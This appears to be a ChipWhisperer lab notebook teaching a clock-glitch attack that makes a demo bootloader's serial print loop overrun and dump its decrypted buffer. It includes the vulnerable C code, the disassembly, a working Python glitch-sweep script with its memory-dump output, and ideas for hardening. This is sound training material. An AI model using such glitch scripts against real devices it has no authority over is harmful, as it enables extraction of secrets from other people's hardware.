# Glitch Buffer Attacks

This tutorial discusses a specific type of glitch attack. It shows how a simple printing loop can be abused, causing a target to print some otherwise private information. This attack will be used to recover a plaintext without any knowledge of the encryption scheme being used.

In [1]:
#Parameters
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'

## Firmware

This section introduces the attack concept by showing some real world examples of vulnerable firmware. Then, it describes the victim firmware that will be used in this tutorial.

### Real Firmware

Typically, one of the slowest parts of an embedded system is its communication lines. It's pretty common to see a processor running in the MHz range with a serial connection of 9.6k baud. To make these two different speeds work together, embedded firmware usually fills up a buffer with data and lets a serial driver print on its own time. This setup means we can expect to see code like:

```C
for(int i = 0; i < number_of_bytes_to_print; i++)
{
    print_one_byte_to_serial(buffer[i]);
}
```

This is a pretty vulnerable piece of C. Imagine that we could sneak into the source code and change it to:

```C
for(int i = 0; i < really_big_number; i++)
{
    print_one_byte_to_serial(buffer[i]);
}
```

C compilers don't care that `buffer[]` has a limited size - this loop will happily print every byte it comes across, which could include other variables, registers, and even source code. Although we probably don't have a good way of changing the source code on the fly, we do have glitches: a well-timed clock or power glitch could let us skip the `i < number_of_bytes_to_print` check, which would have the same result.

How could this be applied? Imagine that we have an encrypted firmware image that we're going to transmit to a bootloader. A typical communication process might look like:

1. We send the encrypted image ciphertexts over a serial connection
1. The bootloader decrypts the ciphertexts and stores the result somewhere in memory
1. The bootloader sends back a response over the serial port

We have a pretty straightforward attack for this type of bootloader. During the last step, we'll apply a glitch at precisely the right time, causing the bootloader to print all kinds of things to the serial connection. With some luck, we'll be able to find the decrypted plaintext somewhere in this memory dump.

### Building Firmware

For this tutorial, a very simple bootloader using the SimpleSerial protocol has been set up. The source for this bootloader can be found in `chipwhisperer/hardware/victims/firmware/bootloader-glitch`. The following commands are used:

* `pABCD\n`: Send an encrypted ciphertext to the bootloader. For example, this message is made up of the two bytes AB and CD.
* `r0\n\n\n\n\n\n`: The reply from the bootloader. Acknowledges that a message was received. No other responses are used.
* `x`: Clear the bootloader's received buffer.
* `k`: See x.

The bootloader uses triple-ROT-13 encryption to encrypt/decrypt the messages. To help you send messages to the target, the script private/encrypt.py prints the SimpleSerial command for a given fixed string. For example, the ciphertext for the string `Don't forget to buy milk!` is

```
p516261276720736265747267206762206f686c207a76797821\n
```

Now that we've got some basic knowledge of the target code, build it, then navigate to the `bootloader-glitch` firmware directory:

In [2]:
%%bash -s "$PLATFORM"
cd ../../hardware/victims/firmware/bootloader-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE

rm -f -- bootloader-CWLITEARM.hex
rm -f -- bootloader-CWLITEARM.eep
rm -f -- bootloader-CWLITEARM.cof
rm -f -- bootloader-CWLITEARM.elf
rm -f -- bootloader-CWLITEARM.map
rm -f -- bootloader-CWLITEARM.sym
rm -f -- bootloader-CWLITEARM.lss
rm -f -- objdir/*.o
rm -f -- objdir/*.lst
rm -f -- bootloader.s decryption.s stm32f3_hal.s stm32f3_hal_lowlevel.s stm32f3_sysmem.s
rm -f -- bootloader.d decryption.d stm32f3_hal.d stm32f3_hal_lowlevel.d stm32f3_sysmem.d
rm -f -- bootloader.i decryption.i stm32f3_hal.i stm32f3_hal_lowlevel.i stm32f3_sysmem.i
.
-------- begin --------
arm-none-eabi-gcc (GNU Tools for Arm Embedded Processors 7-2018-q2-update) 7.3.1 20180622 (release) [ARM/embedded-7-branch revision 261907]
Copyright (C) 2017 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

.
Compiling C: bootloader.c
arm-none-eabi-gcc -c -mcpu=cortex-m4 -I. -mthumb -mfloat-

## The Attack Plan

### The Sensitive Code

Inside `bootloader.c`, there are two buffers that are used to store most of the important data. The source code shows:
```C
#define DATA_BUFLEN 40
#define ASCII_BUFLEN (2 * DATA_BUFLEN)

uint8_t ascii_buffer[ASCII_BUFLEN];
uint8_t data_buffer[DATA_BUFLEN];
```

This tells us that there will be two arrays stored somewhere in the target's memory. The AVR-GCC compiler doesn't usually try too hard to move these around, so we can expect to find them back-to-back in memory; that is, if we can read past the end of the ASCII buffer, we'll probably find the data buffer.

Next, the code used to print a response to the serial port is:

```C
if(state == RESPOND)
{
	// Send the ascii buffer back 
	trigger_high();
	
	int i;
	for(i = 0; i < ascii_idx; i++)
	{
		putch(ascii_buffer[i]);
	}
	trigger_low();
	state = IDLE;
}
```

This looks very similar to the example code given in the previous section, so it should be vulnerable to a glitching attack. The goal is to cause the loop to continue past its regular limit: `data_buffer[0]` is the same as `ascii_buffer[80]`, so a successful glitch should dump the data buffer for us.

### Disassembly

As a final step, let's check the assembly code to see exactly what we're trying to glitch through. In the same folder as the hex file you built, open the `*.lss` file that corresponds to your target (for example, `bootloader-CWLITEARM.lss`). This is called a listing file, and it contains a bunch of debug and assembly information. Most importantly, it will allow us to easily match the source code to what's in our hex file. Search the file for something close to the vulnerable loop, such as `state == RESPOND`.

#### Compiler Optimizations

While reading the section on the bootloader commands, you may have been surprised to see more than one newline at the end of the respond command (`r0\n\n\n\n\n\n`). Because the response is both so short and always the same length, the compiler will perform loop unrolling. Loop unrolling is an optimization that trades code size for speed by replacing a constant size loop:

```C
for (int i = 0; i < 3; i++) 
    do_something();
```

by a repeated sequence of the loop's operations:

```C
do_something();
do_something();
do_something();
```

For a small number of repititions, size-speed tradeoff is skewed towards the latter, making it very hard to get the compiler not to perform the optimization, thus we simply increase the size of the loop. Most bootloaders have multiple different reponses with varying length, so this isn't a typical obstacle you would face, but it is important for this situation.

The [Wikipedia page on loop unrolling](https://en.wikipedia.org/wiki/Loop_unrolling) contains more information on the topic if you're like to learn more.

#### XMEGA Disassembly

After searching the file, you should see something like this:

```asm
 38c:	89 91       	ld	r24, Y+
 38e:	0e 94 38 02 	call	0x470	; 0x470 <output_ch_0>
 392:	f0 e2       	ldi	r31, 0x20	; 32
 394:	c4 38       	cpi	r28, 0x84	; 132
 396:	df 07       	cpc	r29, r31
 398:	c9 f7       	brne	.-14     	; 0x38c <main+0xbc>

```

This is our printing loop in assembly. It has the following steps in it:

* Look at the address `Y` and put the contents into `r24`. Increase the address stored in `Y`. (This is the i++ in the loop.)
* Call the function in location `0x470`. Presumably, this is the location of the `putch()` function.
* Compare `r28` and `r29` to `0x84` and `0x20`. Unless they're equal, go back to the top of the loop.

There's one quirk to notice in this code. In the C source, the for loop checks whether `i < ascii_idx`. However, in the assembly code, the check is effectively whether `i == ascii_idx`! This is even easier to glitch - as long as we can break past the `brne` instruction once, we'll get to the data buffer.

#### Arm Disassembly

After searching the file, you should see something like this:

```asm
 8000268:	5d28      	ldrb	r0, [r5, r4]
 800026a:	3401      	adds	r4, #1
 800026c:	f000 f8f2 	bl	8000454 <putch>
 8000270:	2c08      	cmp	r4, #8
 8000272:	d1f9      	bne.n	8000268 <main+0x64>
```

We can break this assembly down into the following steps:

* Load the character we want to print into `r0` (`r5` contains the address of `ascii_buffer`, while `r4` is our loop index `i`)
* Add 1 to `r4` (`i`)
* Call `putch`
* Compare `r4` to 8 (8 is always the value of `ascii_idx`)
* Branch back to the beginning of the loop if `r4` and 8 aren't equal

There's one quirk to notice in this code. In the C source, the for loop checks whether `i < ascii_idx`. However, in the assembly code, the check is effectively whether `i == ascii_idx`! This is even easier to glitch - as long as we can break past the `brne` instruction once, we'll get to the data buffer.

## The Attack Script

### Setup

Now that we know what our target is, we can start creating our attack script. Basic setup is the same as usual:

In [3]:
%run "Helper_Scripts/Setup.ipynb"

In [4]:
fw_path = "../../hardware/victims/firmware/bootloader-glitch/bootloader-{}.hex".format(PLATFORM)

In [5]:
cw.programTarget(scope, prog, fw_path)

Detected known STMF32: STM32F302xB(C)/303xB(C)
Extended erase (0x44), this can take ten seconds or more
Attempting to programming 4539 bytes at 0x8000000
STM32F Programming flash...
STM32F Reading flash...
Verified flash OK, 4539 bytes


And setup the glitch module:

In [6]:
if SCOPETYPE == "OPENADC":
    scope.glitch.clk_src = 'clkgen'
    scope.glitch.trigger_src = 'ext_single'
    scope.glitch.repeat = 1
    scope.glitch.output = "clock_only"
    scope.io.hs2 = "glitch"
    if PLATFORM == "CWLITEARM":
        scope.glitch.offset = -37.9
        scope.glitch.width = -7
    elif PLATFORM == "CWLITEXMEGA" or PLATFORM == "CW303":
        scope.glitch.offset = -4.3
        scope.glitch.width = 1.56
elif SCOPETYPE == "CWNANO":
    pass #do this later instead 

### Communicating With Bootloader

In [7]:
print(scope)

cwlite Device
gain = 
    mode = low
    gain = 45
    db   = 22.50390625
adc = 
    state      = False
    basic_mode = rising_edge
    timeout    = 2
    offset     = 0
    presamples = 0
    samples    = 5000
    decimate   = 1
    trig_count = 298475802
clock = 
    adc_src       = clkgen_x4
    adc_phase     = 0
    adc_freq      = 29538459
    adc_rate      = 29538459.0
    adc_locked    = True
    freq_ctr      = 0
    freq_ctr_src  = extclk
    clkgen_src    = system
    extclk_freq   = 10000000
    clkgen_mul    = 2
    clkgen_div    = 26
    clkgen_freq   = 7384615.384615385
    clkgen_locked = True
trigger = 
    triggers = tio4
    module   = basic
io = 
    tio1       = serial_rx
    tio2       = serial_tx
    tio3       = high_z
    tio4       = high_z
    pdid       = high_z
    pdic       = high_z
    nrst       = high_z
    glitch_hp  = False
    glitch_lp  = False
    extclk_src = hs1
    hs2        = glitch
    target_pwr = True
glitch = 
    clk_src     = clkgen
   

Now that we have our setup done, let's work on communicating with the bootloader. There's a few ways to do this, but the easiest is probably to use `target.ser.write` to send our text. Remember, to get to the print buffer, we need to send some `rot13` encoded text. For this example, we'll use `Don't forget to buy milk!`, whose `rot13` encoding is `516261276720736265747267206762206f686c207a76797821`.

Let's also change the ADC clock from being x4 of the target clock to being x1. This way, we can easily use the ADC module (in particular `scope.adc.trig_count`) to see how long sending the response takes.

In [8]:
if SCOPETYPE == "OPENADC":
    scope.clock.adc_src = "clkgen_x1"
def send_milk(ser):
    cmd = "p516261276720736265747267206762206f686c207a76797821\n"
    ser.write(cmd)


Next, let's send the command to the bootloader, observe the response, and measure how long it took. Unfortunately, the CWNANO board doesn't include this functionality. Instead, if you have an oscilloscope or logic analyzer on hand, you can use one of these instead to measure how long the trigger was high for.

In [9]:
import time

scope.arm()
send_milk(target.ser)
time.sleep(0.1)
scope.capture()
num_chars = target.ser.inWaiting()
response = target.ser.read(num_chars, timeout=50)
print(response)
response_type = 0
if SCOPETYPE == "OPENADC":
    response_time = scope.adc.trig_count
    print("The response took {} cycles".format(response_time))

K`     r0






The response took 17014 cycles


In this case, of the STM32F3 target, you should have an active trigger count of roughly 17014 cycles. Remember, we want to glitch the final few instructions of the loop, so our glitch point will be just before the end (say somewhere in the last 50 cycles). Some targets have better defined ranges where the glitch happens (the STM32F3, for example, always happens 21 cycles before the trigger goes low). We don't have this information for the CWNANO, but it should be about the same (say 17020 cycles):

In [10]:
if SCOPETYPE == "CWNANO":
    response_time = 17020
if PLATFORM == "CWLITEARM" or PLATFORM == "CW308_STM32F3":
    ext_range = range(response_time - 22, response_time - 19)
elif PLATFORM == "CWLITEXMEGA" or PLATFORM == "CW303":
    ext_range = range(response_time - 15, response_time - 0)
else:
    ext_range = range(response_time - 40, response_time)
print(ext_range)

range(16992, 16995)


### Glitch Loop 

We're almost ready to create our glitch loop! Before we do, there's a few things to keep in mind. The first is dealing with crashes. As you might expect, we'll often crash the target instead of getting the glitch we want. In this case, we'll need to reset the target before we try communicating with the bootloader. Luckily we can tell if we crashed the target by looking at the state of the trigger pin: if the target crashes, it will never go low (this also happens with a successful glitch, but we'll be checking for success in the response, so this isn't much of an issue). We can check this via `scope.adc.state`.

This part is optional, but to make the response easier to read, we'll also want to do some parsing on the response text, since the response won't all be in ASCII text. This will make use of the `termcolor` module to make non letter/number responses red, which doesn't come with ChipWhisperer and only works on Jupyter/Unix. If you're following along in a Windows command prompt or don't want to install this module, feel free to remove the import and the `colored()` calls.

In [11]:
def my_print(text):
    for ch in text:
        if (ord(ch) > 31 and ord(ch) < 127) or ch == "\n": 
            print(ch, end='')
        else:
            print("0x{:02X}".format(ord(ch)), end='')
        print("", end='')

Our last step before proceeding to the attack loop is to active the glitch module:

In [12]:
if SCOPETYPE == "OPENADC":
    scope.glitch.output = "clock_xor"

We can finally proceed on to our actual loop. Our loop will have the same basic idea as the one from `Fault_1`: we'll need to iterate through ext_offset, offset, and width to find the right settings for a glitch.

As was mentioned earlier, we'll also need to check for a successful glitch to avoid resetting while we're still receiving data. This will also enable us to read the full serial output, since the target will be sending back a lot of data (much more than we can receive in one `ser.read()`). 

Careful inspection of the source reveals that most of what we sent to the device is still in the `ascii_buffer` (with the first 8 or so characters being overwritten). That means we can check for one of the characters after the overwritten part (say `"7"`).

After we're sure we have a glitch, we can just keep looking for more data and printing it.

**Make sure you update the values in the `external offset range` call to reflect what you got earlier in the tutorial**

In [13]:
"""Range = namedtuple('Range', ['min', 'max', 'step'])

offset_range = Range(scope.glitch.offset, scope.glitch.offset + 5, 0.4)
width_range = Range(scope.glitch.width - 2, scope.glitch.width + 5, 0.4)"""

"Range = namedtuple('Range', ['min', 'max', 'step'])\n\noffset_range = Range(scope.glitch.offset, scope.glitch.offset + 5, 0.4)\nwidth_range = Range(scope.glitch.width - 2, scope.glitch.width + 5, 0.4)"

In [14]:
from tqdm import tqdm_notebook, tnrange
from collections import namedtuple

target.init()
reset_target(scope)
print("Init")
broken = False
N = 0

#scope.glitch.width = width_range.min
#while scope.glitch.width < width_range.max:
for k in tnrange(0, 40, desc="width"):
    scope.glitch.width_fine = k
    #scope.glitch.offset = offset_range.min
    if broken:
        break
    #while scope.glitch.offset < offset_range.max:
    for j in tnrange(0, 40, leave=False, desc="offset"):
        scope.glitch.offset_fine = j
        if broken:
            break
        for i in tqdm_notebook(ext_range, leave=False, desc="ext_offset"):
            N += 1
            if scope.adc.state:
                #trigger never went low, target probably crashed
                reset_target(scope)
                #print("Crashed!")

            scope.glitch.ext_offset = i
            scope.arm()

            send_milk(target.ser)
            while target.isDone() is False and timeout:
                timeout -= 1
                time.sleep(0.01)

            try:
                ret = scope.capture()
                if ret:
                    reset_target(scope)
                    continue
            except IOError as e:
                logging.error('IOError: %s' % str(e))
            
            time.sleep(0.05)
            waiting = target.ser.inWaiting()
            output = target.ser.read(waiting, timeout=2)

            #check if we were successful
            if "7" in output:
                print("Glitched!\n\tExt offset: {}\n\tOffset: {}\n\tWidth: {}".format(i, scope.glitch.offset, scope.glitch.width))
                my_print(output)
                broken = True 
                for __ in range(500):
                    waiting = target.ser.inWaiting()
                    if waiting:
                        output = target.ser.read(waiting, timeout=50)
                        my_print(output)
                time.sleep(10)
                break

            if scope.adc.state:
                #trigger never went low, target probably crashed
                reset_target(scope)
                #print("Crashed! Output: {}".format(output))
                
        #scope.glitch.offset += offset_range.step
    #scope.glitch.width += width_range.step
    
#

Init


Glitched!
	Ext offset: 16993
	Offset: -37.890625
	Width: -7.03125
r0





6720736265747267206762206f686c207a767978210x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x00Don't forget to buy milk!0x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x0080x01@0x000x960x00

0x000x000x000x000x000x080x000x000x000x080x0080x01@0x00D0x00@0x0080x01@0xFF0x010x000x000x010x000x000x000x010x000x000x000x000x000x000x00N0x000xD40x060x010x000x010x000x860x060x000x000x070x000x000x000x840xFF0x0B0x000x120x010x000x010x000x000x00@0x830x040x110xDF0x00"0x010x020x030x010x000x000xB80x010x00 0x120x000x000x00 0x010x00 $0x000x000x000x040x030x090x040x010x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x00

0x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x00

0x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x000x00

...

0x0E0x950xD70xF10x190xA90xBE0xE20xAB0xF10xBF +0xF50x9F0x82I]0xD50x86C20xA40xA8+0x9E"0xCC0xBE0x960x94@G0xD3rOS0xAE0x840xEC#0xA20x0C0xAA0xA2}H0xDC0x07TG0xA30x04/0xAA0xA20x1E0xF3JZ*0x96sW50xED0xAC0xAE0x96G0xCDJ0xD5Uw0xD60x070xA80xAB0xBA0x080xCD0xA30xBA0x100xD1AHTA0xD30x05t0x8E0xBA0x0270xF9Gw%eW0x1D-0xAB0x070x0B0x0F0xC10xC20x1F_0x15rT0x8D|]0x070x8FVj.*m0xBE0xCESQ\!-0x97{e
0x810xEFcdT0x020xD10xC2!0xE60xAB~0xA9"0xAE0x1D0x810x880x87O0xE4a0xC30x9B

0x14\<y$wT0x8A0xA80xB70xF20x81j0x920x920x010xDCU0x90U0x140x14q0x860x9C0x890xB90x830x8E0xA60x9EG0x0D0x910x1F0xAB0xCA0xA70xBA;_e0x10E\]0x070xBB:0xF8
0x8D0xC0)0x8A0xCCFIG0xCCm]0x04(jX0xAD0x80N>0xAA0xC60xDCuK0xD80x17O0xAE0xB20xAE0xAC0xAA0xA9r0xBB0x8A0xAB0xD9QP0xF4C}W)0xCB{0x12EDY0x1Eh0xC60xEA0xAB0xAD0x8EB0x8Ct0xC5B0xE40x11PW0xCC0xAA0xE00xE0n0xE9*h0x9D

0x1F0xD50xAA0xBF0x030xBC0xBF0xAB0x9E0xDB0x040xF7k0xF4=-F0xD70xABij0xC20xB70x880xB00x0ESe8D0x9F0xD1QE0xA50xF20xA30xEE0x8A0x8B0xCD0xAA0xC1%0xD5y0x9FV0xCD0x9C0xD7~0xEAy0x990xFE.0xA10xD5WlE0xAA(0xB80xAAI0xB50x900x840x110xDD0xDE0xC9S0xA90xB20xA3'0xEE0x96h0x170xEDTl/u5m0xAB0xE90x1A%0xAE0xF50xAFi0x1E]0x150xFD0xBD:s0xB60xFB0x9A0xFA>0xAD0xFA0xE30xBA0xE7V0xD70xD9]t0x990xD70xB60x140x9A0xAB0xF1

8!f0xBF0xBD0x860xEE0xEE0x150x05g0xB50xC40x9F/0x980xA8z0x8B0x8C0xC30xE90xB90xAC0x05e0x190x800xD50xF10x9A0x19Wk0xEE0xFA0x940x920xE0,0x130x15T0x910xA90xA20xAE-\!#0x05E0x0750xE7O0x02#0x8A0xF20x830x1A0x84X0x0Bu0xD4X0x140xD00x050x120x880xB8b0x080x0C0xB60x05BO0x1A0x95E0xC2V40x8E>0xDC0xAA0x1A0x180xDE!0x14T0x7F0xBDuu0x15Tzu/0x9E0x040xC00x140xFB0xE80xA8
0xA30x850xA6i0xA60x0DDq0x130x850xFC`

\0x960xD10xACl0xAB0xB70x80(F0xB90xA9>0x070xD2PyU*e> 0xAA0xA0\,Bu0x8E:0xE20xA90xEC"0xE40x0EF0x14V0x050x85]0x000x1E0x88

With any luck, you should see a whole bunch of text printed to the screen. Successful glitches might not happen every time, so you may need to rerun the loop a few times.

You should be able to the plaintext near the beginning of the output! The data buffer has successfully been printed to the serial port, allowing us to see the decrypted text with no knowledge of the algorithm. Now that we've got a successful glitch, stop the cell above (since it's still looking for more stuff to print) and let's disconnect the scope and target:

In [19]:
scope.dis()
target.dis()

## Ideas

There's a lot more that can be done with this type of attack...

### Safer Assembly Code

You may have been surprised to see that the assembly code uses a `brne` instruction to check if the loop is finished - after all, we used a less-than comparison in our C source code! Try changing this line to use a more prohibitive loop. Here's how you might do this:

### Volatile Variables

The reason why the original assembly code used the brne instruction is because GCC is an *optimizing compiler*. The compiler doesn't directly translate the C source code into assembly instructions. Instead, it tries to determine if any of the code can be modified to make it faster or more compact. For instance, consider the loop:

```C
for(int i = 0; i < 10; i++)
{
    if(i < 20)
        printf("%s", "Less");
    else
        printf("%s", "Greater");
}
```

If you take a careful look at this code, you'll notice that the following loop will produce the same output:

```C
for(int i = 0; i < 10; i++)
{
    printf("%s", "Less");
}
```

However, this second loop is smaller (less code) and faster (no conditional jumps). This is the kind of optimization a compiler can make.

There are several ways we can stop the compiler from making some of these assumptions. One of these methods uses volatile variables, which look like

```C
volatile int i;
```

A volatile variable is one that could change at any time. There could be many reasons why the value might change on us:

* Another thread might have access to the same memory location
* Another part of the computer might be able to change the variable's value (example: direct memory access)
* The variable might not actually be stored anywhere - it could be a read-only register in an embedded system

In any case, the `volatile` keyword tells the compiler to make no guarantees about this variable.

Try changing the bootloader's source code to use a volatile variable inside the loop. What happens to the disassembly? Is the loop body longer? Connect to the target board and capture a power trace. Does it look different? You'll have to find a new *Ext Trigger Offset* for the glitch module. Can you still perform the attack? Is it feasible to use this fix to avoid glitching attacks?

## Tests

In [17]:
assert (broken == True), "Failed to break bootloader in {} glitches".format(N)